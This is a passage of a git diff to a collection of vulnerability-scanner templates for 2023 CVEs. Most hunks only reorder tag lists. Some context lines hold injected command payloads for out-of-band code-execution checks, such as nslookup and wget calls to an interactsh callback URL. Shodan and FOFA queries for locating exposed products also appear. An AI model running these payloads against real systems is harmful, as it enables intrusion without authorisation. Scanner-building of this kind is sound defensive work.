cve,cve2023,xss,pmb,pmb_project + tags: cve2023,cve,xss,pmb,pmb_project http: - raw: diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 9fd2019595..5d0eaf8051 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: appium product: appium-desktop - tags: huntr,cve,cve2023,appium,oast,rce + tags: cve2023,cve,huntr,appium,oast,rce http: - method: GET diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 4257e61a4c..175f7fe490 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -29,7 +29,7 @@ info: product: vbulletin shodan-query: http.component:"vBulletin" google-query: intext:"Powered By vBulletin" - tags: cve,cve2023,vbulletin,rce,kev + tags: cve2023,cve,vbulletin,rce,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index de3402e0ef..296bbee47c 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -30,7 +30,7 @@ info: vendor: osgeo product: geoserver shodan-query: title:"geoserver" - tags: cve,cve2023,geoserver,ogc,sqli,intrusive,osgeo + tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo http: - raw: diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 48bf4834ca..bcafcade1d 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: churchcrm product: churchcrm - tags: cve,cve2023,churchcrm,xss,authenticated + tags: cve2023,cve,churchcrm,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 8aa940f414..d76eb31acc 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -29,7 +29,7 @@ info: product: ruckus_wireless_admin shodan-query: title:"ruckus wireless" fofa-query: title="ruckus wireless" - tags: cve,cve2023,ruckus,rce,kev,ruckuswireless + tags: cve2023,cve,ruckus,rce,kev,ruckuswireless http: - method: GET diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index eace4b6bcc..9a1a738b38 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -30,7 +30,7 @@ info: vendor: lexmark product: cxtpc_firmware shodan-query: "Server: Lexmark_Web_Server" - tags: cve,cve2023,printer,iot,lexmark + tags: cve2023,cve,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index d96563d514..a44ab810e1 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -28,7 +28,7 @@ info: product: stagil_navigation framework: jira shodan-query: title:Jira - tags: cve,cve2023,lfi,jira,cms,atlassian,stagil + tags: cve2023,cve,lfi,jira,cms,atlassian,stagil http: - method: GET diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index eb7aff1fca..8a7802fd7d 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -26,7 +26,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" - tags: cve,cve2023,adobe,coldfusion,auth-bypass + tags: cve2023,cve,adobe,coldfusion,auth-bypass http: - raw: diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 1ef6ebe5d0..6e67ed3b45 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -29,7 +29,7 @@ info: vendor: "adobe" product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: packetstorm,cve,cve2023,adobe,coldfusion,lfi,kev + tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index eef6ebd3c1..ed0c20a023 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -30,7 +30,7 @@ info: vendor: jorani product: jorani shodan-query: http.favicon.hash:-2032163853 - tags: cve,cve2023,jorani,rce,packetstorm + tags: cve2023,cve,jorani,rce,packetstorm variables: cmd: "id" payload: "" diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 26b011502b..7c1b6ce657 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -29,7 +29,7 @@ info: vendor: weaver product: e-office fofa-query: app="泛微-EOffice" - tags: cve,cve2023,weaver,eoffice,ecology,fileupload,rce,intrusive + tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive variables: file: '{{rand_base(5, "abc")}}' diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index fb4a68e1f9..30dad11a81 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: churchcrm product: churchcrm - tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated + tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index e02b7e4b53..588a6dca73 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: churchcrm product: churchcrm - tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated + tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 58bee7b5cd..aef05ec483 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -28,7 +28,7 @@ info: vendor: joommasters product: jms_blog framework: prestashop - tags: cve,cve2023,prestashop,prestashop-module,sqli,intrusive,joommasters + tags: cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters http: - raw: diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 495a9f6b56..ab48bf7c74 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -30,7 +30,7 @@ info: vendor: appwrite product: appwrite shodan-query: title:"Sign In - Appwrite" - tags: cve,cve2023,appwrite,ssrf,oast + tags: cve2023,cve,appwrite,ssrf,oast http: - method: GET diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 1cac952fe4..9be675e184 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: gdidees product: gdidees_cms - tags: packetstorm,cve,cve2023,file-download,gdidees,lfr + tags: cve2023,cve,packetstorm,file-download,gdidees,lfr http: - method: GET diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index fb91d05ea2..d5cd0fd3da 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -27,7 +27,7 @@ info: vendor: opencats product: opencats shodan-query: title:"opencats" - tags: authenticated,tenable,cve,cve2023,opencats,redirect + tags: cve2023,cve,authenticated,tenable,opencats,redirect http: - raw: diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 371c6d0a1b..d5453afd90 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -30,7 +30,7 @@ info: vendor: inspireui product: mstore_api framework: wordpress - tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui http: - raw: diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index e6f76df290..3da3e0b787 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -30,7 +30,7 @@ info: vendor: papercut product: papercut_mf shodan-query: http.html:"PaperCut" - tags: packetstorm,cve,cve2023,papercut,rce,oast,unauth,kev + tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev variables: cmd: "nslookup {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 525fe32cf9..4bfe0b0083 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -29,7 +29,7 @@ info: vendor: spip product: spip shodan-query: html:"spip.php?page=backend" - tags: packetstorm,cve,cve2023,spip,rce + tags: cve,cve2023,packetstorm,spip,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index e2e13a79a9..705e9a72cf 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -31,7 +31,7 @@ info: vendor: home-assistant product: home-assistant shodan-query: title:"Home Assistant" - tags: cve,cve2023,homeassistant,auth-bypass,rce,home-assistant + tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant http: - raw: diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 664b22a8ba..2088e7d488 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: superset shodan-query: html:"Apache Superset" - tags: packetstorm,cve,cve2023,apache,superset,auth-bypass + tags: cve2023,cve,packetstorm,apache,superset,auth-bypass http: - raw: diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 1f689d32f6..9b7fb6efc0 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: readtomyshoe_project product: readtomyshoe - tags: cve,cve2023,debug,readtomyshoe,disclosure,readtomyshoe_project + tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project http: - raw: diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index c11a1248f2..1e755be7ee 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -28,7 +28,7 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive,lfprojects + tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: - raw: diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 8ccab41cd5..034e3054c5 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -26,7 +26,7 @@ info: product: newsletter framework: wordpress publicwww-query: /wp-content/plugins/newsletter/ - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin + tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin http: - raw: diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index dbd2865cf5..535eca75a8 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -31,7 +31,7 @@ info: shodan-query: 'vuln:CVE-2023-2796' fofa-query: "wp-content/plugins/eventon/" google-query: inurl:"/wp-content/plugins/eventon/" - tags: wpscan,packetstorm,cve,cve2023,wordpress,wp-plugin,wp,eventon,bypass,myeventon + tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon http: - method: GET diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 6b9c9dd5fd..a94ca57ede 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -32,7 +32,7 @@ info: framework: wordpress publicwww-query: /wp-content/plugins/woocommerce-payments google-query: inurl:/wp-content/plugins/woocommerce-payments - tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index dfe67b8556..11ec332836 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -25,7 +25,7 @@ info: vendor: ajaydsouza product: connections_reloaded framework: wordpress - tags: wpscan,cve,cve2023,wordpress,wp-theme,xss,ajaydsouza + tags: cve2023,cve,wpscan,wordpress,wp-theme,xss,ajaydsouza variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index ac815747ce..d747637623 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -28,7 +28,7 @@ info: product: ethos_identity shodan-query: html:"Ellucian Company" google-query: "login with ellucian ethos identity" - tags: cve,cve2023,cas,xss,ellucian + tags: cve2023,cve,cas,xss,ellucian http: - method: GET diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index f777e31a04..ffabaee458 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -28,7 +28,7 @@ info: vendor: gitlab product: gitlab shodan-query: title:"Gitlab" - tags: cve,cve2023,gitlab,lfi,kev,authenticated,intrusive + tags: cve2023,cve,gitlab,lfi,kev,authenticated,intrusive variables: data: "{{rand_base(5)}}" diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 44fcd4d80b..0f94d5b6f2 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -26,7 +26,7 @@ info: vendor: technocrackers product: bulk_price_update_for_woocommerce framework: wordpress - tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers + tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers http: - raw: diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 0230aa6c14..33780330be 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: zohocorp product: manageengine_admanager_plus - tags: packetstorm,cve,cve2023,manageengine,admanager,rce,oast,authenticated,zohocorp + tags: cve,cve2023,packetstorm,manageengine,admanager,rce,oast,authenticated,zohocorp variables: cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1" diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 05e442f079..e81f363c26 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -27,7 +27,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" - tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev + tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev http: - method: GET diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 642524ab39..04c33600ef 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -26,7 +26,7 @@ info: product: sharepoint_server shodan-query: http.headers_hash:-1968878704 fofa-query: app="Microsoft-SharePoint" - tags: cve,cve2023,microsoft,sharepoint_server + tags: cve2023,cve,microsoft,sharepoint_server variables: client_id: "00000003-0000-0ff1-ce00-000000000000" diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 2dc688f492..e89871ace4 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: purchase_order_management_project product: purchase_order_management - tags: cve,cve2023,sqli,purchase-order,poms,purchase_order_management_project + tags: cve2023,cve,sqli,purchase-order,poms,purchase_order_management_project http: - raw: diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index f016b66f39..279a371665 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: purchase_order_management_project product: purchase_order_management - tags: cve,cve2023,xss,purchase-order-management-system,purchase_order_management_project + tags: cve2023,cve,xss,purchase-order-management-system,purchase_order_management_project http: - raw: diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index ef9659afd7..1641b7bcc7 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: nuovo product: spreadsheet-reader - tags: cve,cve2023,nuovo,spreadsheet-reader,lfi + tags: cve2023,cve,nuovo,spreadsheet-reader,lfi http: - method: GET diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index b0f63da447..10eea64d71 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -27,7 +27,7 @@ info: vendor: powerjob product: powerjob fofa-query: app="PowerJob" - tags: cve,cve2023,powerjob,unauth + tags: cve2023,cve,powerjob,unauth http: - raw: diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index 6d4763125c..d978fe54eb 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -22,7 +22,7 @@ info: max-request: 2 vendor: totolink product: x5000r_firmware - tags: packetstorm,cve,cve2023,totolink,unauth,rce,intrusive + tags: cve2023,cve,packetstorm,totolink,unauth,rce,intrusive http: - raw: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 1c3efab831..12d9097269 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -30,7 +30,7 @@ info: product: leocustomajax framework: prestashop shodan-query: http.component:"Prestashop" - tags: cve,cve2023,prestashop,sqli,leotheme + tags: cve2023,cve,prestashop,sqli,leotheme http: - raw: diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index a1ccdac2f2..25f99c5b2d 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ourphp product: ourphp - tags: cve,cve2023,xss,ourphp,unauthenticated + tags: cve2023,cve,xss,ourphp,unauthenticated http: - method: GET diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index e604e1a839..0a15e378a7 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ourphp product: ourphp - tags: cve,cve2023,xss,ourphp + tags: cve2023,cve,xss,ourphp http: - method: GET diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 90da2790d6..b7ecde2f16 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: webkul product: qloapps - tags: packetstorm,cve,cve2023,xss,webkul-qloapps,unauth,webkul + tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul http: - method: GET diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index 908cb51cfe..b224e7cbab 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -27,7 +27,7 @@ info: vendor: magnussolution product: magnusbilling shodan-query: http.html:"magnusbilling" - tags: packetstorm,cve,cve2023,magnusbilling,rce,oast,unauth,intrusive,magnussolution + tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution http: - method: GET diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 7401793560..983fd228bd 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -22,7 +22,7 @@ info: metadata: shodan-query: title:"Cacti" verified: "true" - tags: cve,cve2023,cacti,authenticated + tags: cve2023,cve,cacti,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index 59df8e081c..3390ca4d29 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: rudderstack product: rudder-server - tags: packetstorm,cve,cve2023,rudder,rudderstack + tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli variables: cmd: "wget {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index 4f2853ca57..7edb2d98c7 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -29,7 +29,7 @@ info: vendor: advancedcustomfields product: advanced_custom_fields framework: wordpress - tags: wpscan,cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields + tags: cve2023,cve,wpscan,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields http: - raw: diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index 8b8bf3c5d7..4ff04a9da5 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -26,7 +26,7 @@ info: vendor: cms_tree_page_view_project product: cms_tree_page_view framework: wordpress - tags: wpscan,packetstorm,cve,cve2023,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project + tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project http: - raw: diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 186834ffda..50233d1005 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -28,7 +28,7 @@ info: product: repetier-server shodan-query: title:"Repetier-Server" fofa-query: title="Repetier-Server" - tags: cve,cve2023,repetier,lfi,repetier-server + tags: cve2023,cve,repetier,lfi,repetier-server http: - method: GET diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index e5d1c7d2f3..a2b9366d02 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: churchcrm product: churchcrm - tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated + tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index e03e5c39e5..49b47c36f3 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -29,7 +29,7 @@ info: product: eventon framework: wordpress publicwww-query: "/wp-content/plugins/eventon-lite/" - tags: wpscan,packetstorm,cve,cve2023,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon + tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon http: - method: GET diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index ccb5d63285..fd4cee7a30 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -29,7 +29,7 @@ info: product: ghost framework: node.js shodan-query: http.component:"Ghost" - tags: cve,cve2023,lfi,ghostcms,ghost,node.js + tags: cve2023,cve,lfi,ghostcms,ghost,node.js http: - method: GET diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 1cc37bed8b..9b56042e9f 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -31,7 +31,7 @@ info: product: essential_addons_for_elementor framework: wordpress google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite - tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper http: - raw: diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 5aee7724ae..a5eda0c86e 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -27,7 +27,7 @@ info: vendor: igniterealtime product: "openfire" shodan-query: title:"openfire" - tags: cve,cve2023,auth-bypass,openfire,console,kev,igniterealtime + tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime http: - raw: diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 4b3817e0f4..eca1fff260 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: phpgurukul product: old_age_home_management_system - tags: cve,cve2023,oahms,sqli,auth-bypass,phpgurukul + tags: cve2023,cve,oahms,sqli,auth-bypass,phpgurukul http: - raw: diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index e795064cc0..859279c1e5 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: blogengine product: blogengine.net - tags: cve,cve2023,Blogengine,cms,redirect,blogengine + tags: cve2023,cve,Blogengine,cms,redirect,blogengine http: - method: GET diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 8e56092c29..5b2d7561a6 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: faculty_evaluation_system_project product: faculty_evaluation_system - tags: packetstorm,cve,cve2023,faculty,rce,intrusive,faculty_evaluation_system_project + tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project variables: email: "{{randstr}}@{{rand_base(5)}}.com" diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 3db018a6e5..0b14ca0700 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -29,7 +29,7 @@ info: vendor: masteriyo product: masteriyo framework: wordpress - tags: wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo + tags: cve2023,cve,wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo http: - raw: diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index 39e8c74ebb..47129ca651 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -29,7 +29,7 @@ info: product: jeecg_p3_biz_chat framework: wordpress shodan-query: http.favicon.hash:1380908726 - tags: cve,cve2023,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress + tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress http: - method: GET diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index 6d0874edbb..82ddcd1315 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -30,7 +30,7 @@ info: vendor: dolibarr product: dolibarr_erp\/crm shodan-query: http.favicon.hash:440258421 - tags: cve,cve2023,dolibarr,unauth + tags: cve2023,cve,dolibarr,unauth http: - method: GET diff --git a/http/cves/2023/CVE-2023-33584.yaml 